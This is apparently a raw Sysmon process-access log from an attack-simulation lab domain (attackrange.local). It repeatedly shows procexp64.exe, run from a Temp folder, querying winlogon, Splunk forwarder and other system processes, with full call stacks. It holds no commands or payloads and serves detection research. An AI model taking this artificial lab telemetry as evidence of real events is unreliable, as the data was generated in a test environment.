15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788400Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788399Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788398Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788397Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788396Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788395Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788394Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788393Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788392Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788391Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788390Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788389Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788388Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788387Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788386Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788385Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788384Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\T